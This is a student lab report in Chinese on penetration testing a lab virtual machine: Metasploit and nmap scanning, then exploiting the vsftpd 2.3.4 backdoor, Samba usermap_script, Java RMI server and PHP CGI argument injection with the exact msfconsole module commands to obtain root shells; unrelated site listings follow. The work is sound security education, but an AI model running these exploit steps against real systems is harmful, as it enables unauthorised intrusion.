20232416 2025-2026-1 《网络与系统攻防技术》实验六实验报告

news/2025/11/20 12:17:22/文章来源:https://www.cnblogs.com/shi0195/p/19245033

1.实验内容

1.1 实验要求

  (1)掌握metasploit、nmap的用法。
(2)学习前期渗透的方法。
(3)利用4个漏洞,实现对靶机的攻击。

1.2 学习内容

  (1)metasploit的用法:可以简单总结为“Search-Use-Show-Set-Exploit/run”。
(2)四种漏洞的原理:
①Vsftpd源码包后门漏洞:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
②SambaMS-RPC Shell命令注入漏洞:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
③Java RMI SERVER命令执行漏洞:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
④PHP CGI参数执行注入漏洞:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

2.实验目的

  通过端口扫描发现靶机漏洞,掌握metasploit的用法,实现多种漏洞的渗透利用。

3.实验过程

3.1 前期渗透

3.1.1 主机发现

在靶机中使用ifconfig得到ip地址为172.16.218.247。

查看靶机IP

在kali中打开msfconsole,通过输入以下命令来扫描指定网段:

search arp_sweep
use 0
set RHOSTS 192.168.46.0/24
run

观察到对应IP为VMware虚拟机

根据实验结果我们可以看到我们成功扫描到我们的靶机,其标识为VMware, Inc.,说明这是一台VMware虚拟机。

3.1.2 端口扫描

  使用nmap进行端口扫描,通过命令nmap -sS -sV 192.168.46.142进行SYN扫描并进行获取其版本。根据扫描结果我们可以看出靶机上开放了大量的端口,同时存在有很多漏洞。截图如下:

端口扫描

3.1.3 漏洞扫描

  通过nmap -script=vuln 192.168.46.142对靶机进行漏洞扫描。扫描结果发现靶机上存在大量漏洞。
对于21端口的FTP服务存在后门漏洞可直接获取root权限,属于高危漏洞,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。截图如下:

21端口漏洞

  对于80端口的HTTP服务存在多种安全漏洞,包括多个路径(如mutillidae/index.php系列页面)存在SQL注入风险,攻击者可通过恶意SQL语句窃取数据或控制服务器;存在Slowloris拒绝服务漏洞(CVE-2007-6750),易被耗尽资源导致服务瘫痪;启用了HTTP TRACE方法,可能引发跨站跟踪(XST)攻击以窃取敏感信息;多个路径(如dvwa/login.php、twiki系列表单)存在跨站请求伪造漏洞,可诱使用户执行非自愿操作;还通过http-enum脚本暴露了twiki、dvwa等应用路径及目录列表,泄露系统结构,属于高危漏洞。

80

80‘

  对于1099端口的RMI注册表存在默认配置远程代码执行漏洞,其默认配置允许从远程URL加载类,可导致攻击者执行远程代码,属于高危漏洞。

1099

  对于5432端口存在多个高危SSL/TLS漏洞,包括SSL/TLS中间人攻击的CCS注入漏洞(CVE-2014-0224)、可导致明文信息泄露的POODLE漏洞(CVE-2014-3566),以及Diffie-Hellman密钥交换组强度不足的漏洞,这些漏洞可能使攻击者实施中间人攻击、窃取敏感信息、劫持会话,属于高危漏洞。

5432

  对于6667端口的IRC服务存在UnrealIRCd恶意后门漏洞,属于被篡改的软件版本,攻击者可通过该后门执行任意命令完全控制服务器,属于高危漏洞。

6667

  对于8180端口存在多处漏洞,多个admin路径下的JSESSIONID未设置HttpOnly标志,易被XSS攻击窃取引发会话劫持;存在Slowloris拒绝服务漏洞(CVE-2007-6750),攻击者可耗尽服务器资源致服务瘫痪;同时枚举到大量admin路径及Tomcat管理界面,泄露系统结构,易引发未授权访问等后续风险。

8180

3.2 Vsftpd源码包后门漏洞(21端口)

  我们在msfconsole控制台中输入以下命令。

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.46.142
run

  再输入uname -a,pwd,id命令,可以看到已经获取靶机的shell,攻击成功。

获取靶机Shell_1

3.3 SambaMS-RPC Shell命令注入漏洞(端口139)

  我们在msfconsole控制台中输入以下命令。

use exploit/multi/samba/usermap_script
set RHOST 192.168.46.142
run

  此时我们可以看到已经获取靶机的shell,攻击成功。

获取靶机Shell_2

3.4 Java RMI SERVER命令执行漏洞(1099端口)

  在前期渗透中已经得知1099端口开放,在msfconsole中输入以下命令。

use exploit/multi/misc/java_rmi_server
set RHOST 192.168.46.142
run
shell

  输入命令whoami,得到结果root,说明攻击成功。

获取靶机Shell_3

3.5 PHP CGI参数执行注入漏洞(80端口)

  我们在msfconsole控制台中输入以下命令

use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.46.142
run
shell

  可以发现我们能够执行命令,说明攻击成功。

获取靶机Shell_4

4.遇到的问题及解决方案

  问题1:第一次进行漏洞扫描时发现运行命令10分钟后依旧毫无反应

扫描问题

  解决方案1:询问AI后发现可能的问题,分别是目标主机未在线或无法访问、访问中可能耗时较长等。我准备一一排查,切换到我的靶机后发现靶机处于休眠状态,不知道这是否有影响,于是我将其唤醒后重新运行指令发现大约1分钟后输出扫描漏洞结果。

5.学习感悟、思考等

  通过本次实验,我掌握了 Metasploit 和 Nmap 的使用方法,学习了前期渗透流程,成功利用 Vsftpd 源码包后门、Samba MS-RPC 命令注入、Java RMI SERVER 命令执行、PHP CGI 参数注入这四个不同类型的漏洞实现对靶机的攻击,还解决了漏洞扫描无响应的问题;这让我深刻认识到网络漏洞的潜在风险,理解了渗透测试在安全防护中的关键作用,也明白在网络安全领域需持续学习工具用法与漏洞原理,才能有效防范攻击、保障系统安全。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/970933.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

深入解析:【2B篇】阿里通义 Qwen3-VL 新增 2B、32B 两个模型尺寸,手机也能轻松运行

深入解析:【2B篇】阿里通义 Qwen3-VL 新增 2B、32B 两个模型尺寸,手机也能轻松运行pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; f…

2025北京托福机构TOP5榜单!无老师/新通领衔,提分率90%+机构全解析

2025北京托福机构TOP5榜单!无老师/新通领衔,提分率90%+机构全解析随着留学申请竞争的加剧,托福成绩作为海外院校录取的核心指标之一,其备考效率与提分质量备受关注。北京作为留学教育资源聚集地,托福培训机构数量…

Why did Sanminism fail?

maybe the traditional Chinese should be Extincted. Jack London thinks Hieroglyphs should all die. So it was simplified. then it should be Chinese. it should be Asian, it should be European, it should o…

网络安全产品深度对比:Detectify与Halo Security的技术架构剖析

本文深入对比Detectify和Halo Security两款外部安全平台的技术架构,涵盖资产发现与分类、漏洞评估方法和用户体验三大核心领域,分析各自的自动化扫描引擎、API测试能力和工作流程设计差异。产品对比:Detectify vs. …

pyppeteer: 连接到已打开的chrome

一,chrome启动调试端口 $ google-chrome --remote-debugging-port=9222 --user-data-dir=/data/python/xianyu/userdataDevTools listening on ws://127.0.0.1:9222/devtools/browser/faddaa6e-98ec-444e-9710-9b7198…

深入解析:【开题答辩过程】以《重庆市社区养老服务小程序设计与实现》为例,不会开题答辩的可以进来看看

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

2025年玻璃棉夹芯板直销厂家权威推荐榜单:聚氨酯夹芯板/两面企口夹芯板/金属幕墙夹芯板系统源头厂家精选

在工业建筑与绿色节能领域,一批掌握核心技术、具备全球视野的企业正推动着中国建筑围护系统向高端化、智能化方向革新。 玻璃棉夹芯板作为一种高性能的建筑材料,以其优异的保温隔热、防火隔音性能,在工业厂房、数据…

使用信号量实现父子父子进程交替运行的学习笔记

使用信号量实现父子父子进程交替运行的学习笔记 在学习进程同步机制时,信号量是一个非常重要的概念。相比于之前使用信号和全局变量实现进程同步的方式,信号量提供了更可靠、更灵活的同步机制。本文记录我使用 Syste…

基于MATLAB实现图像缺陷检测、清晰度评估及自动对焦功能

一、系统架构设计二、核心算法 1. 图像预处理 function preprocessed = preprocess(img)% 灰度化(心理学灰度公式)grayImg = rgb2gray(img);% 自适应去噪(非局部均值滤波)denoised = nlfilter(grayImg, [5 5], @(x…

托福提分认准这些!2025五大靠谱机构推荐,从基础到冲刺全覆盖

托福提分认准这些!2025五大靠谱机构推荐,从基础到冲刺全覆盖随着留学热潮的持续升温,托福成绩作为海外院校申请的核心指标,其重要性愈发凸显。优质的托福培训不仅能帮助学员高效掌握考试技巧,更能系统性提升语言能…

海南州一对一辅导机构靠谱推荐:2026最新教育机构榜! 持证师资精准发力

孩子成绩卡在中游难突破,报大班补习像“陪读”没效果,找一对一又怕遇到师资参差不齐、退费难的糟心事?在海南州,不管是共和县、贵德县、贵南县、同德县、兴海县,还是玛沁县、班玛县、甘德县、达日县、久治县、玛多…

2025 最新切割工程队推荐!混凝土 / 桥梁 / 支撑梁 / 无损切割等全场景工程队口碑排行榜,专业服务权威推荐

引言 在建筑改造与拆除领域,切割施工的安全性、精准度与环保性直接决定工程品质。当前行业存在技术水平不均、设备迭代滞后、安全管理缺失等痛点,导致需求方难以精准筛选靠谱服务团队。本次榜单由国际建筑切割技术协…

2025年淮南一对一家教机构推荐:五大辅导机构测评排行榜,综合实力全解析!

淮南不少家长为孩子课外补习犯愁:小学想打牢基础、初中要应对衔接、高中需重点培优,都希望找到靠谱的一对一辅导或家教,可挑选教育机构、筛选培训服务方的过程满是困扰。部分教育机构的师资信息遮遮掩掩,号称“资深…

2025 最新基质生产线厂家权威推荐榜:泥炭育苗栽培专用设备,全球测评优质厂家全解析花卉/营养土/椰糠/白泥炭/黑泥炭/齿轮筛基质生产线公司推荐

引言 在全球绿色农业革命浪潮下,基质生产线作为现代农业规模化种植的核心装备,其技术先进性、环保合规性与产能适配性直接决定种植效益与生态可持续性。当前行业存在自动化水平不均、配料精度差异大、环保标准执行不…

2025 最新解压机厂家权威推荐榜:椰糠 / 泥炭 / 基质解压机源头厂家测评优选,聚焦专业服务与市场口碑

引言 在全球绿色农业可持续发展浪潮下,基质原料处理设备的技术升级成为行业核心诉求,解压机作为关键生产装备,其性能直接决定产能效率、产品合格率与环保合规水平。据国际农业装备技术协会最新测评数据显示,当前全…

从源码编译安装gdal3.6.2库

安装GDAL (Geospatial Data Abstraction Library) 是处理地理空间数据的重要步骤,其功能强大,广泛应用于GIS软件开发和地理数据处理领域。以下是编译安装GDAL 3.6.2版本的详细指南,步骤简明扼要,为了保证安装过程的…

2025 最新包装盒厂家推荐排行榜:一站式定制解决方案权威测评,涵盖食品、美妆、礼品等多领域优质品牌彩盒印刷/茶叶礼盒/烘焙包装盒订制公司推荐

引言 在消费升级与环保理念深化的双重驱动下,包装盒已成为品牌价值传递与产品竞争力提升的核心载体。然而,行业普遍存在的工艺精度不足、定制响应滞后、环保标准不达标等问题,给采购决策带来诸多挑战。本次排行榜基…

朝阳市一对一辅导机构推荐,2026年课外家教补习机构权威排行榜

“朝阳各区县一对一辅导机构哪家好?小学语数英、初中理化、高中全科补习该选谁?课时费多少钱才划算?有没有靠谱的机构推荐?”这些问题,是双塔区、龙城区、朝阳县、建平县、凌源市、北票市、喀左县7区县家长的共同…

完整教程:ctf.show--web入门--爆破

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

2025 最新工程造价公司咨询推荐榜:国际权威测评认证的全行业靠谱服务商优选指南上海/工程造价审核/工程造价全过程跟踪审计/工程预算造价/厂房工程造价审核/工程结算造价审核公司推荐

引言 在工程建设行业迈向精细化发展的进程中,工程造价咨询的专业度直接决定项目投资回报率与建设合规性,成为行业核心竞争力之一。然而当前市场服务水平参差不齐,部分机构存在专业覆盖不全、核算精准度不足、服务链…